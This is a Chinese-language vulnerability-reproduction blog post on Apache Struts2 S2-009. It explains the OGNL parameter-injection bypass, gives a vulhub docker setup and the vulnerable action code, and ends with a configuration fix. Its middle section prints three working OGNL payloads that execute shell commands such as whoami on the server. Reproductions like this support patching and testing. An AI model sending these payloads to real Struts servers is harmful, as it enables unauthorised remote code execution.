本文主要是介绍漏洞复现----31、Struts2/S2-009,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章目录
- 一、漏洞原理
- 二、环境搭建
- 三、代码解释
- 四、漏洞复现
- 五、修复方法
一、漏洞原理
Struts2对S2-003的修复方法是禁止静态方法调用,在s2-005中可直接通过OGNL绕过该限制,对于#号,同样使用编码\u0023或\43进行绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。
但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/helloword.acton?example=<OGNL statement>&(example)('xxx')=1
的方法来执行它,从而绕过官方对#、\等特殊字符的防御。
ParametersInterceptor中的正则表达式将top [‘foo’](0)作为有效的表达式匹配,OGNL将其作为(top [‘foo’])(0)处理,并将“foo”操作参数的值作为OGNL表达式求值。这使得恶意用户将任意的OGNL语句放入由操作公开的任何String变量中,并将其评估为OGNL表达式,并且由于OGNL语句在 HTTP参数中,攻击者可以使用黑名单字符(例如#)禁用方法执行并执行任意方法,绕过ParametersInterceptor和OGNL库保护。
影响版本:
2.1.0 - 2.3.1.1
二、环境搭建
docker-compose build
docker-compose up -d
访问:ip:8080
三、代码解释
在war包中找到:WEB-INF/src/java/org/apache/struts2/showcase/ajax/Example5Action.java
public class Example5Action extends ActionSupport {private static final long serialVersionUID = 2111967621952300611L;private String name; private Integer age;public String getName() { return name; } //获取name参数public void setName(String name) { this.name = name; } //调用setName将name值赋给私有属性this.namepublic Integer getAge() { return age; }public void setAge(Integer age) { this.age = age; }@Overridepublic String execute() throws Exception {return SUCCESS;}
}
WEB-INF/src/java/struts-ajax.xml
查看URL路由:
<package name="ajax" extends="struts-default">...<action name="example5" class="org.apache.struts2.showcase.ajax.Example5Action"><result name="input">/ajax/tabbedpanel/example5.jsp</result><result>/ajax/tabbedpanel/example5Ok.jsp</result></action>...
</package>
name=example5,所以访问http://ip:8080/ajax/example5.action即可访问该控制器。将OGNL利用代码放在name参数里,访问该URL:
四、漏洞复现
4.1、利用一
POC:
GET /ajax/example5?age=123&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27whoami%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]
4.2、利用二
z[%28name%29%28%27meh%27%29]&age=123&name=(#context["xwork.MethodAccessor.denyMethodExecution"]=false,#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lan g.Runtime@getRuntime().exec('whoami').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#s=@org.apache.struts2.ServletActionContext@getResponse().get Writer(),#s.println(#d),#s.close())(meh)
4.3、利用三
GET /ajax/example5age=123&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true
五、修复方法
1、在 struts.xml 中配置 ParametersIntercptor 以排除恶意参数
<interceptor-ref name="params"><font></font><param name="acceptParamNames">\w+((\.\w+)|(\[\d+\])|(\['\w+'\]))*</param><font></ </interceptor-ref><font></font>
参考链接:https://github.com/vulhub/
这篇关于漏洞复现----31、Struts2/S2-009的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!